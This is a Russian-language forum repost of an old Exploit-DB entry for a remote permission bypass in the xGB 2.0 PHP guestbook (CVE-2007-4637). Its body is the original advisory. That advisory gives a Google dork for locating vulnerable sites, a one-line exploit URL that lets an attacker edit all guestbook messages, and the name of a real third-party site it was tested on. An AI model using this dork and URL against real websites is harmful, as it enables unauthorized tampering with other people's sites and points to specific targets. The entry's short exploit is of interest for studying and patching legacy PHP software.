Exploit xGB 2.0 - 'xGB.php' Remote Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4336
Проверка EDB
  1. Пройдено
Автор
DARKFUNERAL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4637
Дата публикации
2007-08-29
Код:
/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: [email protected]
* 
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# milw0rm.com [2007-08-29]
 
Источник
www.exploit-db.com

Похожие темы